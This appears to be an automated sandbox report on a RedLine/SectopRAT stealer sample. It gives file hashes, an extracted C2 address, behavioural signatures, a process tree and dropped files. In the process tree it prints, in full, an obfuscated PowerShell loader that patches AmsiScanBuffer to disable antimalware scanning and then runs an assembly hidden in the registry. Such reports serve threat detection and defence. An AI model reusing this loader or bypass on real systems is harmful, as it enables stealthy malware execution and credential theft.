Analysis

  • max time kernel
    150s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28-11-2024 02:18

General

  • Target

    234789947ece36321386c3decbeafd2933da462f41056a27b042db2c2fd8aea7.exe

  • Size

    1.1MB

  • MD5

    142727883c537e287bae329e5a2e0ce8

  • SHA1

    981eaaaba35b326a5dbe386cc5a02adeb52447e7

  • SHA256

    234789947ece36321386c3decbeafd2933da462f41056a27b042db2c2fd8aea7

  • SHA512

    e557519293c0518f5df61d77b42a1f2b4ee58c1bb33ae3db5b7c2da4754bf54f652e51f2e437b138fb62e6750b6caa2c882332ef9b86713f9c8a62566a821212

  • SSDEEP

    24576:1MOjO8wmd7hUjBGna1qIWFLISsSaYEbJgEK8LFYUs:1MOjO857CjJuLI1lyEfx

Malware Config

Extracted

Family

redline

Botnet

iShop

C2

venom.underground-cheat.com:1337

Signatures

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 1 IoCs
  • Redline family
  • SectopRAT

    SectopRAT is a remote access trojan first seen in November 2019.

  • SectopRAT payload 1 IoCs
  • Sectoprat family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 1 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Drops file in System32 directory 10 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 18 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies data under HKEY_USERS 55 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:616
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:316
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{bbf3d68d-a298-44e1-b9aa-c19bb4b24a48}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4728
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:672
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
          1⤵
            PID:948
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
            1⤵
              PID:448
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
              1⤵
                PID:1028
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                1⤵
                  PID:1040
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                  1⤵
                    PID:1068
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                    1⤵
                      PID:1204
                      • C:\Windows\system32\taskhostw.exe
                        taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                        2⤵
                          PID:2140
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:dgpMGpVmbvjl{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$LNEOyGRNYZYrwR,[Parameter(Position=1)][Type]$RaIaFYraCg)$jwCbMRxwNFS=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+'f'+[Char](108)+''+[Char](101)+''+[Char](99)+'t'+[Char](101)+''+'d'+''+[Char](68)+''+[Char](101)+''+'l'+''+'e'+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+[Char](77)+''+[Char](101)+'mo'+[Char](114)+''+[Char](121)+''+[Char](77)+''+[Char](111)+''+'d'+''+'u'+''+'l'+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+'e'+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+'e'+''+[Char](84)+''+[Char](121)+''+'p'+''+[Char](101)+'',''+'C'+'l'+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+'S'+'e'+[Char](97)+''+[Char](108)+''+[Char](101)+'d'+[Char](44)+''+[Char](65)+'ns'+'i'+''+[Char](67)+''+[Char](108)+'a'+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+''+'t'+''+[Char](111)+''+[Char](67)+''+'l'+'a'+'s'+''+[Char](115)+'',[MulticastDelegate]);$jwCbMRxwNFS.DefineConstructor('RT'+[Char](83)+''+'p'+''+'e'+''+[Char](99)+''+[Char](105)+''+'a'+''+'l'+'Name'+[Char](44)+''+[Char](72)+'ideB'+[Char](121)+''+'S'+''+[Char](105)+''+[Char](103)+','+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$LNEOyGRNYZYrwR).SetImplementationFlags(''+[Char](82)+''+'u'+''+'n'+''+[Char](116)+''+[Char](105)+''+'m'+''+[Char](101)+','+[Char](77)+''+'a'+''+'n'+''+'a'+'g'+'e'+'d');$jwCbMRxwNFS.DefineMethod(''+'I'+''+'n'+'vo'+[Char](107)+''+[Char](101)+'',''+[Char](80)+'ubli'+[Char](99)+''+','+''+'H'+''+[Char](105)+''+[Char](100)+'eB'+'y'+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+','+''+'N'+'ewS'+'l'+''+[Char](111)+'t'+','+''+[Char](86)+'i'+'r'+''+'t'+''+'u'+''+[Char](97)+''+'l'+'',$RaIaFYraCg,$LNEOyGRNYZYrwR).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+'e'+''+[Char](44)+''+[Char](77)+''+'a'+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $jwCbMRxwNFS.CreateType();}$qiawzcceZnuLn=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+'e'+''+[Char](109)+''+'.'+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType('M'+[Char](105)+''+'c'+''+'r'+''+[Char](111)+''+'s'+''+[Char](111)+''+'f'+''+[Char](116)+''+'.'+''+[Char](87)+''+[Char](105)+'n'+[Char](51)+'2.'+'U'+''+[Char](110)+''+'s'+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+[Char](116)+''+[Char](105)+'v'+'e'+''+[Char](77)+''+[Char](101)+''+[Char](116)+'h'+[Char](111)+''+'d'+'s');$dOLzvMjtKIGieW=$qiawzcceZnuLn.GetMethod('Ge'+[Char](116)+'P'+[Char](114)+''+[Char](111)+''+'c'+''+'A'+''+[Char](100)+''+'d'+'r'+[Char](101)+''+'s'+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+'u'+''+'b'+'l'+'i'+'c'+[Char](44)+'S'+'t'+''+'a'+'t'+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$gkmfSJHbPDkiPgqHBzl=dgpMGpVmbvjl @([String])([IntPtr]);$QZEexwTILjzndxresJsVBE=dgpMGpVmbvjl @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$uiApYcaVQgb=$qiawzcceZnuLn.GetMethod(''+[Char](71)+''+[Char](101)+'t'+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+'l'+'e'+[Char](72)+''+[Char](97)+'n'+[Char](100)+'le').Invoke($Null,@([Object](''+'k'+'e'+[Char](114)+''+[Char](110)+''+'e'+'l'+'3'+''+'2'+''+[Char](46)+'d'+[Char](108)+''+'l'+'')));$BQLqyEKvYNdeWc=$dOLzvMjtKIGieW.Invoke($Null,@([Object]$uiApYcaVQgb,[Object](''+[Char](76)+''+'o'+''+[Char](97)+''+'d'+''+[Char](76)+'ib'+'r'+''+'a'+'r'+[Char](121)+''+[Char](65)+'')));$VfFdGOcIiPHWJpJKh=$dOLzvMjtKIGieW.Invoke($Null,@([Object]$uiApYcaVQgb,[Object]('V'+[Char](105)+''+'r'+''+'t'+''+[Char](117)+''+[Char](97)+''+'l'+''+[Char](80)+''+'r'+''+[Char](111)+'te'+[Char](99)+''+[Char](116)+'')));$LfCuNsV=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BQLqyEKvYNdeWc,$gkmfSJHbPDkiPgqHBzl).Invoke(''+'a'+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](46)+''+[Char](100)+'ll');$fNldNlNVrsTrSNIWg=$dOLzvMjtKIGieW.Invoke($Null,@([Object]$LfCuNsV,[Object](''+[Char](65)+''+'m'+''+[Char](115)+''+'i'+''+[Char](83)+''+[Char](99)+''+'a'+''+[Char](110)+''+[Char](66)+''+'u'+''+'f'+''+[Char](102)+'e'+[Char](114)+'')));$GYjRaGMxCj=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VfFdGOcIiPHWJpJKh,$QZEexwTILjzndxresJsVBE).Invoke($fNldNlNVrsTrSNIWg,[uint32]8,4,[ref]$GYjRaGMxCj);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$fNldNlNVrsTrSNIWg,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VfFdGOcIiPHWJpJKh,$QZEexwTILjzndxresJsVBE).Invoke($fNldNlNVrsTrSNIWg,[uint32]8,0x20,[ref]$GYjRaGMxCj);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+[Char](84)+'W'+'A'+''+[Char](82)+'E').GetValue(''+'$'+''+'7'+''+'7'+'s'+'t'+''+[Char](97)+'g'+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                          2⤵
                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                          • Command and Scripting Interpreter: PowerShell
                          • Drops file in System32 directory
                          • Suspicious use of SetThreadContext
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:2024
                      • C:\Windows\System32\svchost.exe
                        C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                        1⤵
                          PID:1212
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                          1⤵
                            PID:1316
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                            1⤵
                              PID:1324
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                              1⤵
                                PID:1372
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                1⤵
                                  PID:1472
                                  • C:\Windows\system32\sihost.exe
                                    sihost.exe
                                    2⤵
                                      PID:2828
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                    1⤵
                                      PID:1480
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                      1⤵
                                        PID:1492
                                      • C:\Windows\System32\svchost.exe
                                        C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                        1⤵
                                          PID:1508
                                        • C:\Windows\system32\svchost.exe
                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                          1⤵
                                            PID:1664
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                            1⤵
                                              PID:1724
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                              1⤵
                                                PID:1756
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                                1⤵
                                                  PID:1832
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                  1⤵
                                                    PID:1840
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                    1⤵
                                                      PID:2044
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                      1⤵
                                                        PID:1180
                                                      • C:\Windows\system32\svchost.exe
                                                        C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                        1⤵
                                                          PID:1692
                                                        • C:\Windows\system32\svchost.exe
                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                          1⤵
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:1704
                                                        • C:\Windows\System32\svchost.exe
                                                          C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                          1⤵
                                                            PID:2032
                                                          • C:\Windows\System32\spoolsv.exe
                                                            C:\Windows\System32\spoolsv.exe
                                                            1⤵
                                                              PID:2156
                                                            • C:\Windows\System32\svchost.exe
                                                              C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                              1⤵
                                                                PID:2256
                                                              • C:\Windows\System32\svchost.exe
                                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                                1⤵
                                                                  PID:2432
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                  1⤵
                                                                    PID:2536
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                    1⤵
                                                                      PID:2544
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                      1⤵
                                                                      • Drops file in System32 directory
                                                                      PID:2668
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                      1⤵
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:2724
                                                                    • C:\Windows\sysmon.exe
                                                                      C:\Windows\sysmon.exe
                                                                      1⤵
                                                                        PID:2736
                                                                      • C:\Windows\System32\svchost.exe
                                                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                        1⤵
                                                                          PID:2756
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                          1⤵
                                                                            PID:2772
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                            1⤵
                                                                              PID:2852
                                                                            • C:\Windows\system32\wbem\unsecapp.exe
                                                                              C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                              1⤵
                                                                                PID:3060
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                                1⤵
                                                                                  PID:1048
                                                                                • C:\Windows\system32\svchost.exe
                                                                                  C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                  1⤵
                                                                                    PID:3428
                                                                                  • C:\Windows\Explorer.EXE
                                                                                    C:\Windows\Explorer.EXE
                                                                                    1⤵
                                                                                      PID:3532
                                                                                      • C:\Users\Admin\AppData\Local\Temp\234789947ece36321386c3decbeafd2933da462f41056a27b042db2c2fd8aea7.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\234789947ece36321386c3decbeafd2933da462f41056a27b042db2c2fd8aea7.exe"
                                                                                        2⤵
                                                                                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                        • Suspicious use of SetThreadContext
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:464
                                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                                                        2⤵
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:4788
                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          3⤵
                                                                                            PID:2956
                                                                                          • C:\Users\Admin\AppData\Local\Temp\svchost.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
                                                                                            3⤵
                                                                                            • Executes dropped EXE
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:1984
                                                                                      • C:\Windows\system32\svchost.exe
                                                                                        C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                        1⤵
                                                                                          PID:3640
                                                                                        • C:\Windows\system32\DllHost.exe
                                                                                          C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                          1⤵
                                                                                            PID:3832
                                                                                          • C:\Windows\System32\RuntimeBroker.exe
                                                                                            C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                            1⤵
                                                                                              PID:3976
                                                                                            • C:\Windows\System32\RuntimeBroker.exe
                                                                                              C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                              1⤵
                                                                                                PID:4124
                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                1⤵
                                                                                                  PID:2040
                                                                                                • C:\Windows\System32\svchost.exe
                                                                                                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                  1⤵
                                                                                                    PID:4580
                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                    C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                    1⤵
                                                                                                      PID:1220
                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                      C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                      1⤵
                                                                                                      • Modifies data under HKEY_USERS
                                                                                                      PID:4948
                                                                                                    • C:\Windows\system32\SppExtComObj.exe
                                                                                                      C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                      1⤵
                                                                                                        PID:2644
                                                                                                      • C:\Windows\System32\svchost.exe
                                                                                                        C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                        1⤵
                                                                                                          PID:3416
                                                                                                        • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                          "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                          1⤵
                                                                                                          • Drops file in System32 directory
                                                                                                          • Modifies data under HKEY_USERS
                                                                                                          PID:376
                                                                                                        • C:\Windows\system32\DllHost.exe
                                                                                                          C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                          1⤵
                                                                                                            PID:4544
                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                            C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                                                                                                            1⤵
                                                                                                              PID:3388
                                                                                                            • C:\Windows\System32\RuntimeBroker.exe
                                                                                                              C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                              1⤵
                                                                                                                PID:2180
                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                                                                                                                1⤵
                                                                                                                  PID:4584
                                                                                                                • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                  C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                  1⤵
                                                                                                                  • Checks BIOS information in registry
                                                                                                                  • Checks SCSI registry key(s)
                                                                                                                  • Enumerates system info in registry
                                                                                                                  PID:3176
                                                                                                                • C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                  C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                  1⤵
                                                                                                                    PID:4516
                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
                                                                                                                    1⤵
                                                                                                                      PID:4756
                                                                                                                    • C:\Windows\System32\mousocoreworker.exe
                                                                                                                      C:\Windows\System32\mousocoreworker.exe -Embedding
                                                                                                                      1⤵
                                                                                                                        PID:2172
                                                                                                                      • C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
                                                                                                                        C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
                                                                                                                        1⤵
                                                                                                                          PID:1800

                                                                                                                        Network

                                                                                                                        MITRE ATT&CK Enterprise v15

                                                                                                                        Replay Monitor

                                                                                                                        Loading Replay Monitor...

                                                                                                                        Downloads

                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\svchost.exe

                                                                                                                          Filesize

                                                                                                                          162KB

                                                                                                                          MD5

                                                                                                                          152e3f07bbaf88fb8b097ba05a60df6e

                                                                                                                          SHA1

                                                                                                                          c4638921bb140e7b6a722d7c4d88afa7ed4e55c8

                                                                                                                          SHA256

                                                                                                                          a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc

                                                                                                                          SHA512

                                                                                                                          2fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4

                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\tmpCDA5.tmp

                                                                                                                          Filesize

                                                                                                                          40KB

                                                                                                                          MD5

                                                                                                                          a182561a527f929489bf4b8f74f65cd7

                                                                                                                          SHA1

                                                                                                                          8cd6866594759711ea1836e86a5b7ca64ee8911f

                                                                                                                          SHA256

                                                                                                                          42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914

                                                                                                                          SHA512

                                                                                                                          9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\tmpCDBB.tmp

                                                                                                                          Filesize

                                                                                                                          114KB

                                                                                                                          MD5

                                                                                                                          f1b0d67d9700b657fffb1e53c14444ae

                                                                                                                          SHA1

                                                                                                                          ae8a3a681da72d78263510a2e6a2ad5a66cb0164

                                                                                                                          SHA256

                                                                                                                          7a26e63a529f6c2ceb6063b72e61caae2a643152c7b1b75b3396a700aac95bc1

                                                                                                                          SHA512

                                                                                                                          a2b3ab1807a517b1b499df7d8cbd7b695918113f4124b60ab54b6fa1b2fee6d0813c73202ceec42c7b9fc2c124e0555ecff62acb948cf0ddc19b51607f527b50

                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\tmpCDE6.tmp

                                                                                                                          Filesize

                                                                                                                          48KB

                                                                                                                          MD5

                                                                                                                          349e6eb110e34a08924d92f6b334801d

                                                                                                                          SHA1

                                                                                                                          bdfb289daff51890cc71697b6322aa4b35ec9169

                                                                                                                          SHA256

                                                                                                                          c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a

                                                                                                                          SHA512

                                                                                                                          2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574

                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\tmpCDEC.tmp

                                                                                                                          Filesize

                                                                                                                          20KB

                                                                                                                          MD5

                                                                                                                          49693267e0adbcd119f9f5e02adf3a80

                                                                                                                          SHA1

                                                                                                                          3ba3d7f89b8ad195ca82c92737e960e1f2b349df

                                                                                                                          SHA256

                                                                                                                          d76e7512e496b7c8d9fcd3010a55e2e566881dc6dacaf0343652a4915d47829f

                                                                                                                          SHA512

                                                                                                                          b4b9fcecf8d277bb0ccbb25e08f3559e3fc519d85d8761d8ad5bca983d04eb55a20d3b742b15b9b31a7c9187da40ad5c48baa7a54664cae4c40aa253165cbaa2

                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\tmpCE02.tmp

                                                                                                                          Filesize

                                                                                                                          116KB

                                                                                                                          MD5

                                                                                                                          f70aa3fa04f0536280f872ad17973c3d

                                                                                                                          SHA1

                                                                                                                          50a7b889329a92de1b272d0ecf5fce87395d3123

                                                                                                                          SHA256

                                                                                                                          8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8

                                                                                                                          SHA512

                                                                                                                          30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\tmpCE3D.tmp

                                                                                                                          Filesize

                                                                                                                          96KB

                                                                                                                          MD5

                                                                                                                          40f3eb83cc9d4cdb0ad82bd5ff2fb824

                                                                                                                          SHA1

                                                                                                                          d6582ba879235049134fa9a351ca8f0f785d8835

                                                                                                                          SHA256

                                                                                                                          cdd772b00ae53d4050150552b67028b7344bb1d345bceb495151cc969c27a0a0

                                                                                                                          SHA512

                                                                                                                          cdd4dbf0b1ba73464cd7c5008dc05458862e5f608e336b53638a14965becd4781cdea595fd6bd18d0bf402dccffd719da292a6ce67d359527b4691dc6d6d4cc2

                                                                                                                        • C:\Windows\Temp\__PSScriptPolicyTest_wqm3vyoy.ikd.ps1

                                                                                                                          Filesize

                                                                                                                          60B

                                                                                                                          MD5

                                                                                                                          d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                          SHA1

                                                                                                                          6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                          SHA256

                                                                                                                          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                          SHA512

                                                                                                                          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                        • memory/464-33-0x0000000005430000-0x0000000005518000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          928KB

                                                                                                                        • memory/464-49-0x0000000005430000-0x0000000005518000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          928KB

                                                                                                                        • memory/464-5-0x0000000005660000-0x00000000056F2000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          584KB

                                                                                                                        • memory/464-55-0x0000000005430000-0x0000000005518000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          928KB

                                                                                                                        • memory/464-69-0x0000000005430000-0x0000000005518000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          928KB

                                                                                                                        • memory/464-67-0x0000000005430000-0x0000000005518000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          928KB

                                                                                                                        • memory/464-65-0x0000000005430000-0x0000000005518000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          928KB

                                                                                                                        • memory/464-63-0x0000000005430000-0x0000000005518000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          928KB

                                                                                                                        • memory/464-61-0x0000000005430000-0x0000000005518000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          928KB

                                                                                                                        • memory/464-59-0x0000000005430000-0x0000000005518000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          928KB

                                                                                                                        • memory/464-57-0x0000000005430000-0x0000000005518000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          928KB

                                                                                                                        • memory/464-53-0x0000000005430000-0x0000000005518000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          928KB

